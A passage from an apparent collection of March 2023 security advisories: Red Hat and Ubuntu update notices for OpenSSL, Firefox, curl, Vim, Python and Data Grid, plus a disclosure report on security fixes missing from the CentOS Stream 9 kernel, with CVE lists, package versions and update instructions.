Red Hat Security Advisory 2023-1335-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1335-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1335  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

ppc64:  
openssl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-1.0.2k-26.el7_9.s390x.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-devel-1.0.2k-26.el7_9.s390.rpm  
openssl-devel-1.0.2k-26.el7_9.s390x.rpm  
openssl-libs-1.0.2k-26.el7_9.s390.rpm  
openssl-libs-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-static-1.0.2k-26.el7_9.ppc.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-perl-1.0.2k-26.el7_9.s390x.rpm  
openssl-static-1.0.2k-26.el7_9.s390.rpm  
openssl-static-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQgXUA/8C3pn0SsQbBdhO20gpMoAy86c/lqv+iCz  
1NyIsfk6xTvXXoigT5Rsx0GJVSoh7ZcPTGgapkoQLBM4Wvv3bSJCPeDQLtp2Q+Me  
DSEm+QE8V8RghpoadjIWq98uk7Aw6zI71Cu7twHoDQH3uxCZ3Vzw2O8pLjroZifS  
/xWBC6R0Vn+HkMHsYYHqXVFpOwgTb3QWl8GJiXsM5TEpqO/CgWcZ9CHoQuKybV+o  
PbRYL8PgILj1NNDvaUK/WyQ9oCO++x1JCl4hWFs7FsyoBbQU6/JBCwTHNhVilykF  
E/KDXy1AUx0ry1ygy2t12D1NwOS/QIPvryvr8/SJ4Fo4iR2n+q1QU4Mnj1N16WCN  
bYm4pZlQsCJ9g+2qTBS32LS3ua3Glwfng4DkmJIkNGmJ4ixPKvut7MsnOSvMHaKj  
Wmxc/bCCNKg6Zlhz6RO2XmSNNc86u6Jkd3367QrkJYScUrvbKuj8w1acy+B5Cf9W  
dzKOEE73xC6n495NKe3pk3zHymu9eT4sOIhjQ/t4P6gwWEFmw1TLN65aNO8O8bfj  
T2HbLA0V81Xysq4WzlrWVR7uRYOyMlPbBjSa3g6MZv7BqB6/Eq9gqqCuNpsWSfyl  
x3oWlRhKb7LJnwYqRo9Lryoro/aUlmwJOmAa5yyb/GKNa3XkTrL8dw4BRsyU5NM6  
29sbSDI9Q+0=EWmC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1335-01

The kernel tree of CentOS Stream 9 suffers from multiple use-after-free conditions that were already patched in upstream stable trees.

    CentOS Stream 9: missing kernel security fixesSomeone reminded me last week that lots of enterprise Linux kernels arenot based on upstream stable trees. The most notable enterprise Linuxdistro I'm aware of is RHEL (Red Hat Enterprise Linux), so I decided totake a look at the kernel tree of CentOS Stream 9 - according to<https://developers.redhat.com/products/rhel/contribute-to-rhel>CentOS Stream is the closest freely available thing to RHEL.The CentOS Stream 9 kernel(<https://gitlab.com/redhat/centos-stream/src/kernel/centos-stream-9>)is based on the original upstream 5.14 release, so I decided to lookthrough for interesting commits in the linux-5.15.y stable tree andcheck whether the same commits exist in the CentOS kernel tree.One interesting candidate I found is390031c94211 (\"coredump: Use the vma snapshot in fill_files_note\")which fixes a locking bug that can lead to out-of-bounds writes,but from what I can tell actually exploiting this would be a big painbecause unless you manage to race with the vulnerable code twice,a memory write will happen approximately 4GiB out of bounds.ebda44da44f6 (\"net: sched: fix race condition in qdisc_graft()\")also looked maybe interesting.9a2544037600 (\"ovl: fix use after free in struct ovl_aio_req\")looks like a moderately nice bug, but I think it might only behittable on CentOS if an ext4 filesystem is mounted, althoughhttps://access.redhat.com/articles/rhel-limits seems to implythat ext4 is a supported filesystem on RHEL.I am reporting this bug under our usual 90-day deadline this time because ourpolicy currently doesn't have anything stricter for cases where security fixesaren't backported; we might change our treatment of this type of issue in thefuture.It would be good if upstream Linux and distributions like you could figure outsome kind of solution to keep your security fixes in sync, so that an attackerwho wants to quickly find a nice memory corruption bug in CentOS/RHEL can'tjust find such bugs in the delta between upstream stable and your kernel.(I realize there's probably a lot of history here.)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-03-19.Related CVE Numbers: CVE-2023-1249,CVE-2023-0590,CVE-2023-1252.Found by: jannh@google.com

CentOS Stream 9 Missing Kernel Security Fixes

Red Hat Security Advisory 2023-1336-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1336-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1336  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.9.0-3.el8_7.src.rpm

aarch64:  
firefox-102.9.0-3.el8_7.aarch64.rpm  
firefox-debuginfo-102.9.0-3.el8_7.aarch64.rpm  
firefox-debugsource-102.9.0-3.el8_7.aarch64.rpm

ppc64le:  
firefox-102.9.0-3.el8_7.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el8_7.ppc64le.rpm  
firefox-debugsource-102.9.0-3.el8_7.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el8_7.s390x.rpm  
firefox-debuginfo-102.9.0-3.el8_7.s390x.rpm  
firefox-debugsource-102.9.0-3.el8_7.s390x.rpm

x86_64:  
firefox-102.9.0-3.el8_7.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el8_7.x86_64.rpm  
firefox-debugsource-102.9.0-3.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQg87Q/+PKo6O1kRwMFpHkpBsSymKSc+Ulnnae6T  
QyFVb54cSXh61UV2pkDkaM2wdWIB4kqMJC0qypkvjRdyd4X1JHAnAJ8a1pcoA9e2  
x/F7ifLOG9EIHWc/cvDgQc7JdiYx+0gGgfGTNNfo7WqJNSA2WeeEGfB88vH1SNtt  
fzYSySlJlyQ3Ry/GnaGJ1zj5IzWR9sobsexu8coHS8czs3KPFt//RVleQcwM+clC  
nA00JGWzWtsjIKNmtOdvsSeMiBu5F+Sz3qVCDvHrwqFUVM2uNg67qESc+HSSQct6  
vibydDsz7FJqhePmXSuVSNZFiYhti+5hfYj2EmsNq5K9uyfhGg7c3rYo9QM18jfe  
TmgxlQx1K690DdH2tPb8QJpQgTuhkbJO6zTJqC/rprhfY97iDOQPcd1U9zWH84ag  
2OlTprMHQ3lNXtO6k5JHIfhJ37rIsBLiz9VggBW/6Muhuozjj5j/6CFJQhuEEVLh  
N29SaOokONjw7nS1YSyeKP3byOzvq4j0DLZoB7LGj8wkJfJ6b70EYf9GoVb/5Xdk  
7Hgt0B099KqpgVNJiFsDmVMRsinWTTirg0uWgerTaYl1gUOX9IfaqOYmFjchpCBw  
f0vrfEg7j5sYdzIqFXci0X7ZbW1M0XvCOMwu5krElbnwp0l9/LLdw2/2O/5XlXdj  
yf+1Jyp0mYg=lUzG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1336-01

Ubuntu Security Notice 5964-1 - Harry Sintonen discovered that curl incorrectly handled certain TELNET connection options. Due to lack of proper input scrubbing, curl could pass on user name and telnet options to the server as provided, contrary to expectations. Harry Sintonen discovered that curl incorrectly handled special tilde characters when used with SFTP paths. A remote attacker could possibly use this issue to circumvent filtering.

==========================================================================  
Ubuntu Security Notice USN-5964-1  
March 20, 2023

curl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in curl.

Software Description:  
- curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Harry Sintonen discovered that curl incorrectly handled certain TELNET  
connection options. Due to lack of proper input scrubbing, curl could pass  
on user name and telnet options to the server as provided, contrary to  
expectations. (CVE-2023-27533)

Harry Sintonen discovered that curl incorrectly handled special tilde  
characters when used with SFTP paths. A remote attacker could possibly use  
this issue to circumvent filtering. (CVE-2023-27534)

Harry Sintonen discovered that curl incorrectly reused certain FTP  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27535)

Harry Sintonen discovered that curl incorrectly reused connections when the  
GSS delegation option had been changed. This could lead to the option being  
reused, contrary to expectations. (CVE-2023-27536)

Harry Sintonen discovered that curl incorrectly reused certain SSH  
connections. This could lead to the wrong credentials being reused,  
contrary to expectations. (CVE-2023-27538)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   curl                            7.85.0-1ubuntu0.5  
   libcurl3-gnutls                 7.85.0-1ubuntu0.5  
   libcurl3-nss                    7.85.0-1ubuntu0.5  
   libcurl4                        7.85.0-1ubuntu0.5

Ubuntu 22.04 LTS:  
   curl                            7.81.0-1ubuntu1.10  
   libcurl3-gnutls                 7.81.0-1ubuntu1.10  
   libcurl3-nss                    7.81.0-1ubuntu1.10  
   libcurl4                        7.81.0-1ubuntu1.10

Ubuntu 20.04 LTS:  
   curl                            7.68.0-1ubuntu2.18  
   libcurl3-gnutls                 7.68.0-1ubuntu2.18  
   libcurl3-nss                    7.68.0-1ubuntu2.18  
   libcurl4                        7.68.0-1ubuntu2.18

Ubuntu 18.04 LTS:  
   curl                            7.58.0-2ubuntu3.24  
   libcurl3-gnutls                 7.58.0-2ubuntu3.24  
   libcurl3-nss                    7.58.0-2ubuntu3.24  
   libcurl4                        7.58.0-2ubuntu3.24

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5964-1  
   CVE-2023-27533, CVE-2023-27534, CVE-2023-27535, CVE-2023-27536,  
   CVE-2023-27538

Package Information:  
   https://launchpad.net/ubuntu/+source/curl/7.85.0-1ubuntu0.5  
   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.10  
   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.18  
   https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.24

Ubuntu Security Notice USN-5964-1

Ubuntu Security Notice 5963-1 - It was discovered that Vim was not properly performing memory management operations. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. It was discovered that Vim was not properly performing memory management operations. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10.

    ==========================================================================Ubuntu Security Notice USN-5963-1March 20, 2023vim vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim was not properly performing memory managementoperations. An attacker could possibly use this issue to cause a denialof service or execute arbitrary code. This issue only affected Ubuntu 18.04LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-47024,CVE-2023-0049, CVE-2023-0054, CVE-2023-0288, CVE-2023-0433)It was discovered that Vim was not properly performing memory management   operations. An attacker could possibly use this issue to cause a denial    of service or execute arbitrary code. This issue only affected Ubuntu 22.04LTS, and Ubuntu 22.10. (CVE-2023-0051)It was discovered that Vim was not properly performing memory management   operations. An attacker could possibly use this issue to cause a denial    of service or execute arbitrary code. (CVE-2023-1170, CVE-2023-1175)It was discovered that Vim was not properly performing memory management   operations. An attacker could possibly use this issue to cause a denial    of service or execute arbitrary code. This issue only affected Ubuntu 20.04LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-1264)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  vim                             2:9.0.0242-1ubuntu1.2  vim-athena                      2:9.0.0242-1ubuntu1.2  vim-gtk3                        2:9.0.0242-1ubuntu1.2  vim-nox                         2:9.0.0242-1ubuntu1.2  vim-tiny                        2:9.0.0242-1ubuntu1.2Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.4  vim-athena                      2:8.2.3995-1ubuntu2.4  vim-gtk                         2:8.2.3995-1ubuntu2.4  vim-gtk3                        2:8.2.3995-1ubuntu2.4  vim-nox                         2:8.2.3995-1ubuntu2.4  vim-tiny                        2:8.2.3995-1ubuntu2.4Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.12  vim-athena                      2:8.1.2269-1ubuntu5.12  vim-gtk                         2:8.1.2269-1ubuntu5.12  vim-gtk3                        2:8.1.2269-1ubuntu5.12  vim-nox                         2:8.1.2269-1ubuntu5.12  vim-tiny                        2:8.1.2269-1ubuntu5.12Ubuntu 18.04 LTS:  vim                             2:8.0.1453-1ubuntu1.11  vim-athena                      2:8.0.1453-1ubuntu1.11  vim-gtk                         2:8.0.1453-1ubuntu1.11  vim-gtk3                        2:8.0.1453-1ubuntu1.11  vim-nox                         2:8.0.1453-1ubuntu1.11  vim-tiny                        2:8.0.1453-1ubuntu1.11Ubuntu 16.04 ESM:  vim                             2:7.4.1689-3ubuntu1.5+esm17  vim-athena                      2:7.4.1689-3ubuntu1.5+esm17  vim-athena-py2                  2:7.4.1689-3ubuntu1.5+esm17  vim-gtk                         2:7.4.1689-3ubuntu1.5+esm17  vim-gtk-py2                     2:7.4.1689-3ubuntu1.5+esm17  vim-gtk3                        2:7.4.1689-3ubuntu1.5+esm17  vim-gtk3-py2                    2:7.4.1689-3ubuntu1.5+esm17  vim-nox                         2:7.4.1689-3ubuntu1.5+esm17  vim-nox-py2                     2:7.4.1689-3ubuntu1.5+esm17  vim-tiny                        2:7.4.1689-3ubuntu1.5+esm17Ubuntu 14.04 ESM:  vim                             2:7.4.052-1ubuntu3.1+esm7  vim-athena                      2:7.4.052-1ubuntu3.1+esm7  vim-gtk                         2:7.4.052-1ubuntu3.1+esm7  vim-nox                         2:7.4.052-1ubuntu3.1+esm7  vim-tiny                        2:7.4.052-1ubuntu3.1+esm7In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5963-1  CVE-2022-47024, CVE-2023-0049, CVE-2023-0051, CVE-2023-0054,  CVE-2023-0288, CVE-2023-0433, CVE-2023-1170, CVE-2023-1175,  CVE-2023-1264Package Information:  https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.2  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.4  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.12  https://launchpad.net/ubuntu/+source/vim/2:8.0.1453-1ubuntu1.11

Ubuntu Security Notice USN-5963-1

Ubuntu Security Notice 5960-1 - Yebo Cao discovered that Python incorrectly handled certain URLs. An attacker could possibly use this issue to bypass blocklisting methods by supplying a URL that starts with blank characters.

==========================================================================  
Ubuntu Security Notice USN-5960-1  
March 16, 2023

python2.7, python3.10, python3.5, python3.6, python3.8 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Python could be made to bypass blocklisting methods if a specially  
crafted URL was provided.

Software Description:  
- python3.10: An interactive high-level object-oriented language  
- python3.8: An interactive high-level object-oriented language  
- python2.7: An interactive high-level object-oriented language  
- python3.6: An interactive high-level object-oriented language  
- python3.5: An interactive high-level object-oriented language

Details:

Yebo Cao discovered that Python incorrectly handled certain URLs.  
An attacker could possibly use this issue to bypass blocklisting  
methods by supplying a URL that starts with blank characters.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  python3.10                      3.10.7-1ubuntu0.3

Ubuntu 22.04 LTS:  
  python3.10                      3.10.6-1~22.04.2ubuntu1

Ubuntu 20.04 LTS:  
  python3.8                       3.8.10-0ubuntu1~20.04.7

Ubuntu 18.04 LTS:  
  python2.7                       2.7.17-1~18.04ubuntu1.11  
  python3.6                       3.6.9-1~18.04ubuntu1.12

Ubuntu 16.04 ESM:  
  python2.7                       2.7.12-1ubuntu0~16.04.18+esm4  
  python3.5                       3.5.2-2ubuntu0~16.04.13+esm7

Ubuntu 14.04 ESM:  
  python2.7                       2.7.6-8ubuntu0.6+esm14

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5960-1  
  CVE-2023-24329

Package Information:  
  https://launchpad.net/ubuntu/+source/python3.10/3.10.7-1ubuntu0.3  
  https://launchpad.net/ubuntu/+source/python3.10/3.10.6-1~22.04.2ubuntu1  
  https://launchpad.net/ubuntu/+source/python3.8/3.8.10-0ubuntu1~20.04.7  
  https://launchpad.net/ubuntu/+source/python2.7/2.7.17-1~18.04ubuntu1.11  
  https://launchpad.net/ubuntu/+source/python3.6/3.6.9-1~18.04ubuntu1.12

Ubuntu Security Notice USN-5960-1

Red Hat Security Advisory 2023-1303-01 - Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 7.3.10 replaces Data Grid 7.3.9 and includes security fixes. Issues addressed include code execution and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Data Grid 7.3.10 security update  
Advisory ID:       RHSA-2023:1303-01  
Product:           Red Hat JBoss Data Grid  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1303  
Issue date:        2023-03-17  
CVE Names:         CVE-2021-39144   
=====================================================================

1. Summary:

An update for Red Hat Data Grid is now available.

 Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution.  
It increases application response times and allows for dramatically  
improving performance while providing availability, reliability, and  
elastic scale.

 Data Grid 7.3.10 replaces Data Grid 7.3.9 and includes security fixes. Find  
out more about Data Grid 7.3.10 in the Release Notes [3].

Security Fix(es):

* xstream: Arbitrary code execution via unsafe deserialization of  
sun.tracing.* [jdg-7] (CVE-2021-39144)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

To install this update, do the following:

 1. Download the Data Grid 7.3.10 server patch from the customer portal[²].  
2. Back up your existing Data Grid installation. You should back up  
databases,  
configuration files, and so on.  
3. Install the Data Grid 7.3.10 server patch. Refer to the 7.3.10 Release  
Notes[³]  
for patching instructions.  
4. Restart Data Grid to ensure the changes take effect.

4. Bugs fixed (https://bugzilla.redhat.com/):

1997772 - CVE-2021-39144 xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.*

5. References:

https://access.redhat.com/security/cve/CVE-2021-39144  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381&product=data.grid&version=7.3&downloadType=patches  
https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html-single/red_hat_data_grid_7.3_release_notes/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBTYVNzjgjWX9erEAQhHthAAiqFael90Zr9oJeXz2tVOoc3arF/dAAHI  
